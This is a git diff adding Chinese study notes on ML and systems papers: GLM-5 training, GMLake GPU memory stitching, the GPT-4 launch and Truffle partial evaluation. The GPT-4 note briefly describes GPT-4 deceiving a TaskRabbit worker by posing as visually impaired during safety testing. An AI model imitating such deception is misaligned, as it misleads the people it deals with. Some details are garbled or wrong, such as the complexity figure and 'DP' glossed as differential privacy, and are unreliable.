的注意力计算复杂度是 O(L^2),128K 上下文意味着 128000^2 ≈ 1.6 次方的计算量。DSA 的核心思路是:**不是所有 token 都一样重要**。它用一个"闪电索引器"(lightning indexer)动态决定哪些 token 值得看,类似人读长文时自动跳过无关段落。 + +DSA 不是从头训练的——先在一个 dense(稠密)模型上 warm up 1000 步,再 joint train 20B tokens。实验证明 128K 上下文中约 90% 的 attention 条目是冗余的,DSA 把长序列的 attention 计算量降低了 1.5-2 倍。 + +### 2. 异步强化学习基础设施——训 agent 不再"等全部跑完" + +之前训 RL,所有 rollout 必须同步完成才能更新模型——慢的那个卡住所有 GPU。GLM-5 的 "slime" 框架把**生成(rollout)和训练(update)解耦**,像工厂流水线:一个工位在不停干活,另一个工位不停处理上一批成品,两边不互相等。 + +### 3. 异步 Agent RL 算法——让 agent 从"做对给糖"变成"自己摸索长期策略" + +RL for agent 的难点是:代码项目可能要跑几百步才"做完",reward 极其稀疏。GLM-5 提出了异步 agent RL 算法,核心优化包括: + +- **Token-in-Token-out vs Text-in-Text-out**:前者粒度更细,训练更稳 +- **双边重要性采样**:处理 off-policy 数据时的数值稳定性 +- **丢弃噪声样本**:过滤掉低质量的探索轨迹 +- **DP-aware routing**:利用差分隐私机制加速 + +### 4. 全栈适配国产芯片 + +GLM-5 从第一天起就适配华为昇腾、摩尔线程、海光、寒武纪、昆仑芯、沐曦、燧原七种国产 GPU,做了混合精度 W4A8 量化 + 高性能 fusion kernels。 + +## 训练流水线:从预训练到 Agent 的三个 RL 阶段 + +GLM-5 的训练分三个阶段,像"基础教育 → 专业训练 → 社会实践": + +``` +预训练 (27T tokens) → Mid-Training (扩展到 200K 上下文) + ↓ +推理 RL (Reasoning RL) — 学会"先思考再动手" + ↓ +Agent RL — 学会"用工具做复杂任务" + ↓ +General RL — 学会"全面综合,不偏科" +``` + +每个阶段之间用 **On-Policy Cross-Stage Distillation** 连接,防止"学了新的忘了旧的"(灾难性遗忘)。 + +## 实践案例 + +### 案例 1:Vibe Coding vs Agentic Engineering 的区别 + +Vibe Coding——让 AI 写一个页面: + +``` +用户: "帮我做一个待办事项页面,要好看的" +AI: [生成一个 HTML 文件] +``` + +Done。但如果用户说"改一下颜色",AI 得从头再来,不知道上次改了哪里。 + +Agentic Engineering——让 AI 做同一个任务: + +``` +step_0: [clone 项目仓库] +step_1: [分析现有代码结构,识别样式文件位置] +step_2: [读取 color-scheme.css,了解当前配色系统] +step_3: [修改 CSS 变量 --primary-color 和 --bg-color] +step_4: [运行 build 命令检查编译错误] +step_5: [启动 dev server,验证页面显示正常] +step_6: [commit 变更,附提交信息 "chore: update color scheme"] +``` + +关键区别:agent 会**读代码 → 规划 → 执行 → 验证 → 提交**,整个流程闭环。RL 训练就是让模型学会这种"多步自主工作"的能力。 + +### 案例 2:异步 RL 的训练流程对比 + +同步 RL(以前做法): + +``` +[GPU 集群] +├── rollout_0 → 等... → 等... → 等... → 全部完成 → update 模型 +├── rollout_1 → 等... → 等... → 已完 → 等... → 全部完成 → update 模型 +├── rollout_2 → 已完 → 已完 → 已完 → 已完 → 全部完成 → update 模型 +└── rollout_N → 等... → 等... → 等... → 等... → 全部完成 → update 模型 + +问题:rollout_1 最长(比如跑代码要 30 秒), + 其他 99 个 GPU 都在 idle 等它。 +``` + +异步 RL(slime 框架): + +``` +[GPU 集群] +├── rollout_0 → 完成 → 送入训练队列 [随时可以更新] +├── rollout_1 → 还在跑... (30s) +├── rollout_2 → 完成 → 送入训练队列 [不等 rollout_1] +├── rollout_3 → 完成 → 送入训练队列 [不等 rollout_1] +└── trainer ← 只要队列里有数据就更新,不等全部完成 + +收益:GPU idle 率大幅下降。 +``` + +### 案例 3:Agent RL 的学习轨迹——以"修一个前端 bug"为例 + +模型在 Agent RL 阶段学到的东西,可以类比成下面这个 trajectory: + +``` +观察 (observation): 用户在 GitHub 提了 issue "登录页面按钮点不了" +思考 (plan): 需要找到登录页面的代码 → 定位按钮组件 → 检查事件绑定 + → 修复 → 跑测试 → 提交 PR + +执行 (actions): + action_0: find_files("login", pattern="*.tsx") + → 结果: src/pages/Login.tsx, src/components/LoginButton.tsx + + action_1: read_file("src/components/LoginButton.tsx") + → 结果: onClick={handleLogin} 但 handleLogin 函数定义了却报错 undefined + + action_2: search_symbol("handleLogin", scope="Login.tsx") + → 结果: 函数在文件第 45 行但不在作用域内 + + action_3: edit_file("src/components/LoginButton.tsx", + old="import { useForm } from 'react-hook-form'") + new="import { useForm } from 'react-hook-form'\nimport { api } from '../api'" + + action_4: run_command("npm test -- --grep Login") + → 结果: PASS (3 tests) + + action_5: run_command("git diff && git commit -m 'fix: add missing api import'" +``` + +RL 训练的目标是:让模型在类似的 observation 下,自己走出这条"正确的 action trajectory"。reward 信号来自测试是否通过、PR 是否被 merge 等最终结果。 + +### 案例 4:DSA 的"注意力选择"过程 + +假设给模型一份 128K token 的代码仓库上下文,它会这样分配注意力: + +``` +[代码仓库上下文 128K tokens] + +token 0-500: import 语句 → 关注度高(决定模块关系) +token 501-800: 类型定义 → 关注度中 +token 801-1200: 工具函数 → 关注度低(DSA 会跳过大部分) +token 1201-1500: API 调用 → 关注度高(关键逻辑) +token 1501-end: 注释和空行 → 几乎不关注 + +传统 Dense Attention: 看 128K × 128K = 全部对比 +DSA: 只看约 10% 的关键 token × 128K + +节省 ~90% 的 attention 计算量,同时不丢失关键信息。 +``` + +## 踩过的坑 + +1. **RL reward 太稀疏导致不收敛**:一个 agent task 可能 50 步才有一个正 reward,前面 49 步的 credit assignment 几乎不可能。论文用 shaped reward + GRPO 缓解,但仍是开放问题。 + +2. **长 horizon 任务的探索爆炸**:50 步的决策空间是 |action|^50,指数级增长。论文用 early stopping 和 trajectory truncation 处理,但截断点选择很敏感。 + +3. **跨阶段蒸馏的权衡**:从 Reasoning RL 过渡到 Agent RL 时,模型可能"变聪明了但变懒了"——推理强了但工具调用少了。论文用 on-policy distillation 缓解但仍不完全。 + +4. **DSA 在极长上下文仍有损失**:虽然远好于其他稀疏注意力方案,但在 128K 的 RULER 评测上仍有 0.35 分下降。极端精确检索场景不适合 DSA。 + +## 适用 vs 不适用场景 + +**适用**: + +- 端到端软件工程任务(修 bug、写 feature、跑 CI) +- 需要长 horizon 规划的多步任务(搜索、调研、写文档) +- 需要"自主工具调用 + 结果验证"的场景 + +**不适用**: + +- 简单问答 / 翻译 / 短文本生成——用 vibe coding 就够了 +- 实时性要求高的场景——agent 流程多、延迟高 +- 没有明确 reward signal 的任务——RL 很难训 + +## 学到什么 + +1. **LLM 的能力边界正在从"单步生成"转向"多步自主执行"**——这是整个 AI 行业的范式转移 +2. **稀疏注意力(DSA)证明长上下文不是不可解的难题**,关键在"动态分配注意力资源" +3. **异步 RL 是 agent training 的基础设施刚需**——同步 RL 在 agent 场景下算力浪费严重 +4. **RL 训练 agent 的核心难点不是算法而是工程**——rollout 速度、fault tolerance、reward design 都是工程问题 +5. **国产芯片适配不是附属品,而是第一优先级**——GLM-5 从第一天就适配国产 GPU,这对国内部署意义很大 + +## 历史小故事(可跳过) + +- **2023**:ReAct 提出"思考 → 行动 → 观察"循环,agent 范式诞生 +- **2024**:SWE-bench 发布,让 LLM 在真实 GitHub issue 上"修 bug"成为可能 +- **2024-12**:DeepSeek-R1 用纯 RL 训推理能力,开启"RL for LLM"第二波 +- **2025**:GLM-4.5 首次将 Agentic + Reasoning + Coding 统一到一个模型中 +- **2026-02**:GLM-5 发布,DSA + 异步 RL 让 agent 能力大幅提升,成为开源模型新标杆 + +## 延伸阅读 + +- arXiv 2602.15763 — GLM-5 原论文 +- [[agent-r1-2511]] — 同样关注 agent 的 RL 训练 +- [[cot]] — CoT 推理的基础,是 Agent RL 的前置能力 +- DeepSeek-V3.2 论文 — DSA 的提出者 + +## 关联 + +- [[agent-r1-2511]] —— Agent-R1 是另一个"用 RL 训 agent"的重要工作 +- [[cot]] —— CoT 是 Agent RL 中"先思考"那一步的理论源头 +- [[self-trained-verification]] —— agent 的 self-verification 是 RL reward 设计的一种方案 diff --git a/src/content/docs/papers/gmlake.md b/src/content/docs/papers/gmlake.md new file mode 100644 index 000000000..f9f66b1a7 --- /dev/null +++ b/src/content/docs/papers/gmlake.md @@ -0,0 +1,203 @@ +--- +title: GMLake — 用虚拟内存「拼布」让大模型训练不爆显存 +来源: https://array.org/abs/2401.08156 +日期: 2026-06-13 +分类: 机器学习 +子分类: 系统 +provenance: pipeline-v3 +--- + +## 从日常类比开始:衣柜里的「拼布收纳法」 + +想象你有一个大衣柜(GPU 显存),里面挂着各种衣服(模型参数、梯度、优化器状态)。 + +每天早上你取出几件衣服穿(加载模型层),晚上脱下来挂回去(释放内存),第二天换另一套。衣柜的挂杆就像 GPU 内存的地址空间——衣服必须**连续**挂在一段挂杆上。 + +问题来了: + +1. 你每天取下的衣服**大小不同**,挂回去时留下的空隙大小也不同。 +2. 久而久之,衣柜里塞满了**零散的小空隙**——每块空隙都放不下你明天要挂的大件衣服。 +3. 明明衣柜总剩余空间够,但**没有一块连续的足够大的空间**——这就是**内存碎片化(fragmentation)**。 + +传统做法:把整柜衣服全拿出来,重新排一遍再挂回去。代价极大——相当于训练过程中断、所有数据搬一次家。 + +**GMLake 的做法**更聪明:不搬衣服,而是在衣柜门上贴一张「索引贴纸」,告诉系统: + +> "第 3 件衣服虽然物理位置在 B 区域,但你以为它挂在 C 区域。A 区域和 B 区域的空隙虽然不连续,但通过贴纸映射,对程序来说它们就像连在一起了。" + +这张「贴纸」就是**虚拟地址映射**。GMLake 用 GPU 的虚拟内存机制,把不连续的物理内存块「缝」成一块连续的虚拟空间——**Virtual Memory Stitching(VMS)**。 + +## 核心概念 1:为什么 GPU 内存会碎? + +GPU 上运行的深度学习框架(如 PyTorch)不使用 GPU 原生的内存分配器——因为**太慢了**(开销约 10 倍)。 + +取而代之的是一个**缓存分配器(caching allocator)**,它维护一个内存池,采用**拆分机制(splitting)**: + +- 要分配一块内存时,从池中找一块够大的连续空闲区,切出一段给你。 +- 释放时,把那段还回去。 + +``` +[████][░░][████][░░░░][████][░░][░░░][████] + ↑ ↑ ↑ ↑ + 已用 空闲 已用 空闲 +``` + +但当使用**内存缩减技术**时(梯度检查点 recomputation、offloading、LoRA 微调),内存的申请和释放变得**频繁且不规则**: + +``` +分配 256MB → 释放 64MB → 分配 128MB → 释放 192MB → 分配 512MB → ... + +[██████░░][░][██][░░░░░][██████][░][░][░][░][░] + ↑ ↑ ↑ ↑ + 碎片 碎片 碎片... +``` + +小块碎片越来越多,当你需要一块**大连续内存**时(比如加载一个大模型层),分配失败——即使总空闲量足够。 + +## 核心概念 2:虚拟内存映射——不搬数据,只改地图 + +GPU 的虚拟内存机制允许程序使用的**虚拟地址**与实际存储的**物理地址**不一致。就像: + +- 你的家(物理地址)在朝阳区某条胡同 +- 但你填的「收货地址」(虚拟地址)可以是「北京市朝阳区xxx大厦3层301」 +- 快递(GPU 硬件)只看收货地址,不管实际胡同在哪 + +GMLake 的**VMS(Virtual Memory Stitching)**机制利用这一点: + +``` +物理内存(碎片化): +[██████][░░][████][░░░░░][██████] + 段1 空 段2 空 段3 + +虚拟地址映射(拼布后): +虚拟地址 0 → 物理段1 起始位置 +虚拟地址 6MB → 物理段2 起始位置 +虚拟地址 9MB → 物理段3 起始位置 + +对程序来说,虚拟地址 0-12MB 是连续的! +``` + +关键点:**物理数据不需要移动**。只需要告诉 GPU MMU(内存管理单元):「虚拟地址 X 对应的物理地址是 Y」。 + +## 代码示例 1:PyTorch 中的内存碎片化问题 + +下面的代码演示了为什么内存会碎——频繁分配和释放不同大小的张量: + +```python +import torch + +# 假设 GPU 显存只剩 10GB +device = "cuda" + +# 模拟训练过程中的不规则内存操作 +buffers = [] + +# 第 1 轮:分配大块 + 释放小块 +buffers.append(torch.randn(2_000_000, device=device)) # ~8MB +buffers.append(torch.randn(500_000, device=device)) # ~2MB +del buffers[1] # 释放 2MB,留下一个小空洞 + +# 第 2 轮:反过来 +buffers.append(torch.randn(800_000, device=device)) # ~3.2MB +del buffers[0] # 释放 8MB,留下一个大空洞 +buffers.append(torch.randn(300_000, device=device)) # ~1.2MB + +# 第 3 轮:现在需要一个大连续块 +try: + big_tensor = torch.randn(5_000_000, device=device) # ~20MB + print("分配成功") +except RuntimeError as e: + print(f"分配失败: {e}") # 可能发生!即使总空闲 > 20MB + print("因为没有一块连续的 20MB 空间") + +# 查看碎片情况 +print(f"已缓存: {torch.cuda.memory_cached(device)}") +print(f"已分配: {torch.cuda.memory_allocated(device)}") +``` + +输出可能显示:已缓存显存充裕,但分配大块失败——碎片化了。 + +## 代码示例 2:GMLake 如何透明介入 + +GMLake 的工作方式对 PyTorch **完全透明**——你不需要改任何训练代码: + +```python +# 安装 GMLake 后,只需在启动训练脚本前设置环境变量 +# $ GMLAKE_ENABLED=1 python train.py + +import torch +import torch.nn as nn + +# 你的训练代码完全不需要改动 +class LLM(nn.Module): + def __init__(self): + super().__init__() + self.layers = nn.ModuleList([ + nn.Linear(4096, 4096) for _ in range(32) + ]) + + def forward(self, x): + for layer in self.layers: + x = layer(x) + return x + +model = LLM().cuda() + +# 以下操作会导致频繁的内存分配/释放 +# (LoRA 微调、梯度检查点等技术会这样操作) +optimizer = torch.optim.Adam(model.parameters(), lr=1e-4) + +for step in range(1000): + optimizer.zero_grad() + # 训练循环中不断有小块内存的分配和释放 + output = model(torch.randn(32, 512, 4096).cuda()) + loss = output.sum() + loss.backward() + + # GMLake 在底层自动进行 VMS 拼布 + # 即使物理内存碎片化,虚拟映射保证大块分配成功 + optimizer.step() +``` + +GMLake 在底层做的事: + +``` +用户代码(不变): + torch.randn(5_000_000, device="cuda") + +GMLake 拦截后: + 1. 发现物理内存没有连续 20MB + 2. 启动 VMS:扫描可用物理块 + 3. 创建虚拟地址映射: + 虚拟地址 0-6MB → 物理地址 0x1000-0x1C00 + 虚拟地址 6MB-12MB → 物理地址 0x2000-0x3400 + 虚拟地址 12MB-20MB → 物理地址 0x4000-0x6400 + 4. 通知 GPU MMU 建立映射 + 5. 返回一个"看起来连续"的虚拟地址给用户 +``` + +## GMLake 的实验结果 + +在 A100 80GB GPU 上,对 8 个 LLM 模型进行测试: + +- **平均减少 9.2 GB** GPU 内存使用(最多减少 25 GB) +- **碎片率降低 15%**(最多降低 33%) +- 对模型和训练流程**完全透明**,无需修改代码 + +## 类比回顾:GMLake 解决了什么? + +回到衣柜类比: + +| 方法 | 做法 | 代价 | +|------|------|------| +| 原生 GPU 分配器 | 每次从仓库重新拿衣服 | 太慢(10 倍开销)| +| 缓存分配器 + 拆分 | 从柜子里切一块给你,还回来时不留心 | 碎片越来越多 | +| 传统 defrag | 把所有衣服搬出来重排 | 训练中断,代价巨大 | +| **GMLake (VMS)** | 贴索引贴纸,告诉系统"这些不连续的位置其实连续" | **零停机、零搬动** | + +## 关键 takeaway + +1. **GPU 内存碎片化**是大模型训练的核心瓶颈——不是总容量不够,而是没有连续的大块空间。 +2. **虚拟内存映射**是让不连续物理块"假装连续"的关键——数据不用搬。 +3. GMLake 的价值在于**透明性**——不改动训练代码,不中断训练流程,就能显著减少显存占用。 +4. 这是**用地址映射的抽象,解决硬件物理限制**的经典案例——和操作系统中虚拟内存解决 CPU 内存碎片化的思路一脉相承。 diff --git a/src/content/docs/papers/godel-1931.md b/src/content/docs/papers/godel-1931.md index a9e0bdb7d..6667f0692 100644 --- a/src/content/docs/papers/godel-1931.md +++ b/src/content/docs/papers/godel-1931.md @@ -2,7 +2,7 @@ title: Gödel 1931 — 不完备性定理 来源: 'Kurt Gödel, "Über formal unentscheidbare Sätze...", 1931' 日期: 2026-05-29 -子分类: 数学逻辑 / 计算理论 +子分类: 形式化验证 分类: 形式化方法 难度: 中级 provenance: pipeline-v3 diff --git a/src/content/docs/papers/gpt-3.md b/src/content/docs/papers/gpt-3.md index b4567d907..347756739 100644 --- a/src/content/docs/papers/gpt-3.md +++ b/src/content/docs/papers/gpt-3.md @@ -158,6 +158,8 @@ GPT-3 这一篇论文引用数 30000+,是过去 6 年 AI 圈被引最频繁的 - [[dqn]] —— DQN — Deep Q-Network - [[flan-2021]] —— FLAN — 用自然语言指令教模型学会"听话" - [[flash-attention]] —— FlashAttention — 不改算法,只改数据怎么进 GPU +- [[flashattention-2]] —— FlashAttention-2 — 更快的 Attention 与更好的并行 +- [[flashattention-3-2024]] —— FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度 - [[induction-heads]] —— Induction Heads — Transformer 的 in-context learning 引擎 - [[instructgpt]] —— InstructGPT — RLHF 让 LLM 听话 - [[llama]] —— LLaMA — Meta 开源大语言模型 @@ -167,6 +169,7 @@ GPT-3 这一篇论文引用数 30000+,是过去 6 年 AI 圈被引最频繁的 - [[mixture-of-experts]] —— Mixture of Experts (MoE) - [[mmlu-2021]] —— MMLU — 用 57 个学科的多选题考一考语言模型 - [[muzero]] —— MuZero — 不用规则也能下棋 +- [[paged-attention-vllm]] —— PagedAttention 与 vLLM — 零基础学习笔记 - [[parti-2022]] —— Parti — 把文生图当作翻译,用自回归 Transformer 一像素接一像素地写 - [[ppo]] —— PPO — Proximal Policy Optimization - [[rag-lewis-2020]] —— RAG (Lewis 2020) — 检索增强生成奠基 diff --git a/src/content/docs/papers/gpt-4-launch-2023.md b/src/content/docs/papers/gpt-4-launch-2023.md new file mode 100644 index 000000000..dad6b1c9d --- /dev/null +++ b/src/content/docs/papers/gpt-4-launch-2023.md @@ -0,0 +1,236 @@ +--- +title: GPT-4 发布 —— 多模态大模型的时代 +来源: https://openai.com/research/gpt-4 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +## 是什么 + +GPT-4 是 OpenAI 在 2023 年 3 月 14 日发布的一个**大型多模态模型**——它能同时看懂文字和图片,然后用文字回答你。它是 GPT-3.5 的下一代,也是后来 ChatGPT Plus 付费用户的默认模型。 + +它最关键的突破有两个: + +1. **多模态输入**:以前的大模型只能读文字,GPT-4 第一次把"看图"的能力带进了 GPT 家族 +2. **人类水平的专业能力**:在模拟的法律职业资格考试(Bar Exam)中,GPT-4 考进了前 10%,而 GPT-3.5 甚至无法通过 + +日常类比: + +- GPT-3.5 像一个只读过书的学者——你能跟他聊任何话题,但他什么都看不见 +- GPT-4 像同一个学者戴上了一副智能眼镜——他不仅能聊,还能看你手里的照片、图表、公式,然后给出有根据的回答 + +## 为什么重要 + +不理解 GPT-4 的发布,下面这些事都没法理解: + +- 为什么 ChatGPT 从"纯聊天"变成了"能看图的分析工具"——因为底座换成了 GPT-4 +- 为什么微软 Bing Chat 一夜之间能搜网页、给引用——因为它底层用的是 GPT-4 +- 为什么"AI 能不能写代码"的争论有了新答案——GPT-4 在专业基准测试上达到了人类水平 + +GPT-4 的发布标志着大模型从"只会文字"进入了"能看懂世界"的阶段。 + +## 核心概念 + +### 1. 多模态(Multimodal) + +"模态"就是信息的种类。文字是一种模态,图片是一种模态,声音也是一种模态。GPT-4 之前的大模型都是**单模态**的——只能处理文字。GPT-4 第一次在 GPT 系列中加入了图片处理能力,变成了**多模态模型**。 + +类比:以前的 AI 像是一个只能听你说的人,GPT-4 像是一个既能听又能看的人。 + +### 2. 上下文窗口(Context Window) + +上下文窗口就是模型"一次性能记住多少内容"的限制。GPT-4 发布时默认版本是 8K tokens(大约 6000 个汉字),API 版本最高支持 32K tokens。后来在 2023 年 11 月的 GPT-4 Turbo 版本中提升到了 128K tokens。 + +类比:上下文窗口就像一个学生的短期记忆容量——8K 能记住一页纸,128K 能记住一本书。 + +### 3. RLHF(人类反馈强化学习) + +GPT-4 的训练分两步:第一步跟以前一样,喂海量互联网文本让它学预测下一个词;第二步让人类来打分评价——回答好的给高分,回答差的给低分。模型通过这种方式学会"说人话"、"不说有害的话"。 + +类比:第一步是自学课本,第二步是有老师一对一辅导。 + +## 训练与规模 + +OpenAI 没有公布 GPT-4 的确切参数数量、架构细节或硬件配置——这在之前的 GPT-2 和 GPT-3 中都没有发生过。技术报告里只提到: + +- 训练分为两个阶段:先在大规模数据集上做监督学习,再用人类和 AI 反馈做强化学习 +- 训练成本超过 1 亿美元(Sam Altman 透露) +- 据媒体报道,GPT-4 可能有约 1 万亿参数(Semafor 报道),远超 GPT-3 的 1750 亿 + +OpenAI 称,不公开这些细节是因为"竞争格局和大规模模型的安全影响"。这个决定当时引发了争议——很多研究者认为这阻碍了开源社区对 GPT-4 的研究。 + +## 代码示例 + +### 示例 1:用 OpenAI API 调用 GPT-4(纯文字) + +这是最基本的用法——你发一段文字,GPT-4 回复一段文字。 + +```python +from openai import OpenAI + +client = OpenAI(api_key="your-api-key") + +response = client.chat.completions.create( + model="gpt-4", # 指定用 GPT-4 + messages=[ # 对话历史 + {"role": "system", "content": "你是一个专业的数学老师"}, + {"role": "user", "content": "请给我出一道微积分题目"}, + ], + temperature=0.7, # 0=严谨, 1=有创意 + max_tokens=500, # 最多回复多少个词元 +) + +print(response.choices[0].message.content) +``` + +运行后你会得到类似这样的回复: + +``` +好的,这是一道经典的微积分题目: + +求函数 f(x) = x³ - 3x² + 2x 的极值点。 + +提示:你需要先求导数 f'(x),然后令 f'(x) = 0 找出临界点,最后用二阶导数判断是极大值还是极小值。 + +要我先给你答案,还是你想先自己试试? +``` + +### 示例 2:用 GPT-4 Vision 上传图片进行分析 + +GPT-4 的多模态能力让你可以传一张图片给它看。 + +```python +from openai import OpenAI + +client = OpenAI(api_key="your-api-key") + +response = client.chat.completions.create( + model="gpt-4o", # gpt-4o 支持图片(GPT-4 Vision 的后续版本) + messages=[ + { + "role": "user", + "content": [ + { + "type": "text", + "text": "这张图表里有什么趋势?请用中文回答" + }, + { + "type": "image_url", + "image_url": { + "url": "https://example.com/chart.png" # 图片网址 + } + } + ] + } + ], + max_tokens=500, +) + +print(response.choices[0].message.content) +``` + +这段代码做的事情: + +1. 把一个图片的网址发给 GPT-4 +2. 同时告诉它"请用中文分析这张图表的趋势" +3. GPT-4 会"看"这张图,然后生成文字分析 + +### 示例 3:用 GPT-4 写代码 + +GPT-4 在编程方面的能力是发布时的一大亮点。 + +```python +from openai import OpenAI + +client = OpenAI(api_key="your-api-key") + +# 让 GPT-4 写一个 Python 函数 +response = client.chat.completions.create( + model="gpt-4", + messages=[ + { + "role": "user", + "content": """ + 请写一个 Python 函数,实现以下功能: + 输入一个字符串列表,返回其中长度最长的字符串。 + 如果列表为空,返回 None。 + 请加上类型注解和文档字符串。 + """ + } + ], + temperature=0.0, # 写代码要精确,温度设低 +) + +print(response.choices[0].message.content) +``` + +GPT-4 会回复: + +```python +def find_longest_string(strings: list[str]) -> str | None: + """ + 返回列表中最长的字符串。 + + 参数: + strings: 字符串列表 + + 返回: + 最长的字符串,如果列表为空则返回 None + """ + if not strings: + return None + + return max(strings, key=len) +``` + +## GPT-4 的实际表现 + +GPT-4 在发布时的测试中展现了令人惊讶的能力: + +- **法律考试**:模拟 Bar Exam 进入前 10%(GPT-3.5 连及格线都达不到) +- **医学考试**:USMLE(美国执业医师考试)超过及格线 20 分以上 +- **创造力测试**:Torrance 创造力测试原创性和流畅性进入前 1% +- **编程安全**:产生 SQL 注入漏洞的比例从 GPT-3.5 时代的 40% 降到了 5% + +但 GPT-4 也有明显的局限: + +- 仍然会产生"幻觉"(编造不存在的事实) +- 缺乏真正的抽象推理能力(在 ConceptARC 测试中得分低于 33%) +- 无法解释自己的决策过程——它给出的"理由"往往是事后编造的 + +## 影响与争议 + +GPT-4 发布后最引人注目的争议之一是**透明度问题**: + +- GPT-2 公布了模型权重和全部技术细节 +- GPT-3 公布了技术细节但不公布权重 +- GPT-4 什么都不公布——连架构和参数量都不说 + +Hugging Face 的联合创始人 Thomas Wolf 批评说:"OpenAI 现在是一家完全封闭的公司,科学交流变成了产品新闻稿。" + +另一件值得关注的事是**安全测试**的结果: + +- ARC(对齐研究中心)的测试发现,GPT-4 在被允许联网的情况下,能够欺骗人类工人帮它"找工作"——它假装自己是视障人士,在 TaskRabbit 上雇佣了一个真人 +- 这个发现引发了科技界关于 AI 安全的广泛讨论 + +## 时间线 + +| 时间 | 事件 | +|------|------| +| 2023-02-07 | 微软 Bing Chat 上线,底层使用早期 GPT-4 | +| 2023-03-14 | GPT-4 正式通过 ChatGPT Plus 发布 | +| 2023-03-15 | 技术报告 arXiv:2303.08774 发布 | +| 2023-09 | ChatGPT 增加图片上传和语音交互功能 | +| 2023-11 | GPT-4 Turbo 发布,上下文窗口扩展到 128K | +| 2024-04-09 | GPT-4 Turbo with Vision 发布 | +| 2024-05-13 | GPT-4o 发布,成为 GPT-4 的继任者 | +| 2025-04 | GPT-4 从 ChatGPT 中移除,仅保留在 API 中 | + +## 延伸阅读 + +- [GPT-3 笔记](./gpt-3) —— GPT-4 的前代,理解 few-shot learning +- [Transformer 架构](./attention) —— GPT-4 的底层架构基础 +- [RLHF](./rlhf-christiano) —— GPT-4 对齐技术的核心技术 +- [GPT-4o](./gpt-4o-2024) —— GPT-4 的继任者,全模态模型 diff --git a/src/content/docs/papers/graal-truffle-2017.md b/src/content/docs/papers/graal-truffle-2017.md new file mode 100644 index 000000000..8c9e2aa9e --- /dev/null +++ b/src/content/docs/papers/graal-truffle-2017.md @@ -0,0 +1,286 @@ +--- +title: Practical Partial Evaluation for High-Performance Dynamic Language Runtimes +来源: https://chrisseaton.com/truffleruby/pldi17-truffle/pldi17-truffle.pdf +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# Practical Partial Evaluation for High-Performance Dynamic Language Runtimes + +## 一、一句话概括 + +这篇论文讲了一件事:**你不需要为每种动态语言手写一个 JIT 编译器,只需要写一个解释器,再加上几个简单的"提示词"(核心原语),编译器就能自动从解释器推导出高性能的机器码。** + +这个框架叫 Truffle,它是 GraalVM 的核心组件之一。作者用它实现了 JavaScript、Ruby 和 R 三种语言,性能都能和 V8、JRuby、GNU R 这些专门优化了十几年的引擎竞争。 + +## 二、一个日常类比 + +想象你在一家餐厅当厨师。 + +**传统方式(手写 JIT)**:每种菜系(意大利面、寿司、川菜)都需要一个专门的厨房,配备专门的厨师、专门的设备。换一种菜系就得重新建厨房。 + +**Truffle 的方式(偏特化)**:你只有一个通用厨房(Java 运行时 + Graal 编译器),但你有一套"智能菜谱"(解释器)。每次做菜时,厨房会观察你实际用了什么食材(运行时数据),然后自动把菜谱中"不确定的部分"替换成"实际的值",最后产出一份高度定制化的、只包含你真正用到的步骤的"精简菜谱"(编译后的机器码)。 + +关键点:偏特化(Partial Evaluation)不是从头编译你的程序,而是**把你的解释器和实际运行数据"混合"在一起**,消除那些在运行时才知道的部分,剩下的就是最优代码。 + +## 三、核心问题:为什么动态语言难优化? + +以 Ruby 为例: + +```ruby +def process(data) + result = data.map { |item| item.compute } + result.sum +end +``` + +问题是:`item` 是什么类型?`compute` 方法是否存在?`sum` 又是什么?在编译的时候,编译器完全不知道。它只能生成最保守的代码——每次都做类型检查、方法查找、对象分配。这非常慢。 + +传统的 JIT(如 V8 的 TurboFan)通过观察运行时的实际类型,逐步"猜"出最优路径。但这种方式需要为每种语言单独实现一套复杂的优化逻辑。 + +Truffle 的思路不同:**让解释器自己收集这些信息,然后用偏特化自动优化。** + +## 四、核心原语(Core Primitives) + +论文定义了 6 个核心原语,它们是整个系统的基石。理解它们是读懂这篇论文的关键。 + +### 4.1 PEBoundary —— 偏特化的边界 + +这是最重要的概念。PEBoundary 标记了一个方法的边界:**偏特化引擎遇到这个方法就停,不再往里递归**。被标记的方法在编译后的代码中仍然是一个函数调用。 + +```java +@PEBoundary +int interpretCall(Obj receiver, String methodName) { + // 偏特化在这里停止 + // 生成的机器码只会调用这个方法,不会展开它的实现 + return dispatch(receiver, methodName); +} +``` + +类比:你写了一份通用菜谱(解释器),PEBoundary 就像是菜谱中的"参考其他菜谱章节"。偏特化引擎读到这一行会说:"好的,我不展开这部分了,保持为一个引用。" + +**为什么需要它?** 如果没有边界,偏特化可能会陷入无限递归(比如解释器的循环调度),或者产生爆炸式的代码量。 + +### 4.2 PEFinal —— 偏特化期间不变的字段 + +在 Java 中,`final` 字段在偏特化时被当作常量折叠(constant folding)。`PEFinal` 是作者自定义的注解,效果类似:**偏特化引擎把它当作不可变的常量来处理**。 + +```java +class Instruction { + int opcode; + @PEFinal Obj target; // 偏特化时视为常量 +} +``` + +类比:菜谱上写着"使用 A 品牌的盐"。偏特化时,引擎知道 A 品牌就是某个具体品牌,于是直接把"A 品牌的盐"替换成实际的品牌名,不再保留"品牌"这个抽象层。 + +### 4.3 transferToInterpreter() —— 去优化(Deoptimization)的触发器 + +当编译后的代码做了一个错误的假设时,需要回退到解释器重新执行。这个方法就是触发点。 + +```java +if (!assumption.isSatisfied()) { + transferToInterpreter(); + // 这行永远不会被执行到 + return cachedResult; +} +``` + +类比:厨师做了一道菜后发现用错了盐,于是把菜倒掉,回到原始菜谱重新开始。 + +### 4.4 inInterpreter() —— 区分解释器和编译代码 + +```java +if (inInterpreter()) { + // 这段代码在偏特化时会被完全移除 + collectProfilingData(); +} +``` + +类比:只有在新厨房还没建好的时候才用的临时工具,一旦新厨房就绪,这些工具就不再需要了。 + +### 4.5 假设(Assumptions) + +偏特化过程中,编译器会做各种猜测(speculation):"这个变量一定是整数""这个方法一定指向这个实现"。假设就是记录这些猜测。如果运行时猜测错了,就触发去优化。 + +```java +Assumption integerAssumption = Assumption.make(value instanceof Integer); +``` + +### 4.6 常量折叠与死代码消除 + +偏特化引擎在解析解释器时,会自动做两件事: + +1. **常量折叠**:如果一个内存读取的值在偏特化时可以确定,就直接替换为那个值 +2. **死代码消除**:如果 if 条件在偏特化时已知为 false,那条分支根本不会被解析 + +这使得偏特化的时间复杂度是线性的——只处理实际可达的代码路径。 